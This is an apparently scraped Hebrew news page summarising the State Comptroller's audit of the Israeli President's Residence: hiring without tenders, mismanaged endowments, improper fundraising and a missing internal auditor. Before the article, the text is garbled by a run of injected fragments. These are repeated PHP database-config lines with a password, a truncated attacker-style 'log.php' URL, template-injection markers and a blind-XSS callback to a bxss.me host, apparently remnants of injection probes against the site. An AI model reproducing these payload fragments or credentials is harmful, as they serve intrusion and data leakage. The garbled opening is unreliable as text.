$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> משרד מבקר המדינה מצא ליקויים בהתנהלות בבית נשיא המדינה
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

נמצאו ליקויים בביקורת מבקר המדינה בבית נשיא המדינה

תאריך: 12/01/2011 11:18   מחבר: מערכת האתר

פעולות הביקורת

בחודשים אפריל-דצמבר 2008 בדק משרד מבקר המדינה את התנהלות בית הנשיא בשנים 2000-2008 (להלן - התקופה המבוקרת) בכמה עניינים: כוח אדם, קרנות בית הנשיא, גיוס תרומות ומתן חסויות. דוח זה הוא דוח ראשון של מבקר המדינה העוסק בבית הנשיא.

עיקרי הממצאים

בית הנשיא חרג מהנחיות התקשי"ר ומהמקובל בשירות המדינה בבכל הקשור להעסקתם של עובדים במסגרת משרות אימון, העסקת יועצים בחוזים קבלניים, העסקת יועצים בהתנדבות, מתן הטבות שכר ועוד. כמו כן, העסיק בית הנשיא עובדים בדרכים השונות מהמקובל בשירות המדינה.

בבית הנשיא לא היה תקן כנדרש בשירות המדינה. "משרות התקן" בבית הנשיא השתנו במהלך התקופה המבוקרת לפי העובדים שאיישו אותן.

בית הנשיא התעלם לאורך שנים ובאופן שיטרתי מחובת קיום מכרז לעובדים. לפי המבקר בתקופה המבוקרת אוישו כל המשרות בבית הנשיא שחייבו איוש באמצעות מכרז - ללא מכרז, למעט משרה אחת.

נמצא כי מינויים בתקופה המבוקרת לא היו תקינים: עובדים מונו ללא מכרז, משרות אמון אוישו ללא קביעת מסגרת של כמות המשרות, יועצים בחוזה קבלן ויועצים בהתנדבות מונו שלא בהתאם לעקרונות החלים בשירות המדינה ומינוי בפועל הוארך לתקופה של למעלה משנתיים.

בבית הנשיא פועלות מספר קרנות באמצעות הֶקְדֵשׁוֹת. בביקורת נמצאו ליקויים בניהולם: כספים הוצאו מההקדשות בניגוד לשטרי ההקדש; ההוצאות המינהליות בהקדשות היו גבוהות ביחס להוצאותיהם; ניהול כספי ההקדשות היה רצוף אי-סדרים וגרם לאובדן נכסיהם; המלצותיהם של היועץ המשפטי לממשלה והחשב הכללי במשרד האוצר משנת 2001 בדבר סיום פעולת ההקדשות לא יושמו. רשם ההקדשות לא מנע ליקויים אלה על אף סמכויותיו ואחריותו.

הביקורת העלתה כי מנכ"ל בית הנשיא לשעבר, מר משה גורל, עסק בגיוס כספים לטובת עמותה שביצעה פרויקט שיזם הנשיא קצב. גיוס הכספים נעשה בניגוד לחוק שירות המדינה.

במאי 2008 נערכה בירושלים ועידת "נשיא ישראל 2008 - פונים אל המחר". הוועידה מומנה באמצעות תרומות. מהביקורת עולה כי הוועידה הייתה אירוע ממלכתי, והיה ראוי שימומן מתקציב המדינה.

חוק הביקורת הפנימית, התשנ"ב-1992, מחייב כי בבית הנשיא תקוים ביקורת פנימית. מהביקורת של מבקר המדינה עלה כי מיולי 2006 לא כיהן מבקר פנימי בבית הנשיא.

סיכום והמלצות

על מנכ"ל בית הנשיא לקבוע אותן על-פי אמות מידה ציבוריות של מינהל תקין ושקיפות. על המנכ"ל להשתית את מנגנון בית הנשיא על עובדים קבועים שממלאים את תפקידם ללא קשר לתחלופת הממונים עליהם: לקבוע תקן כנדרש בשירות המדינה; לקבוע מסגרת של כמות משרות האמון כמקובל בשירות המדינה; ולקיים מכרזים כנדרש על-פי החוק.

על בית הנשיא לאמץ את עמדת היועץ המשפטי לממשלה והחשב הכללי במשרד האוצר בעניין קרנות בית הנשיא ולפעול ללא דיחוי לסיום פעילות ההקדשות.

על הנהלת בית הנשיא להימנע מעריכת אירועים ממלכתיים על חשבון תרומות ולהקפיד על מימונם מתקציב המדינה. כמו כן, על בית הנשיא למנות מבקר פנימי, כנדרש על-פי החוק.

תגיות בעמוד:   מבקר המדינה    מכרזים    קרנות    נשיא המדינה    ליקויים    מינויים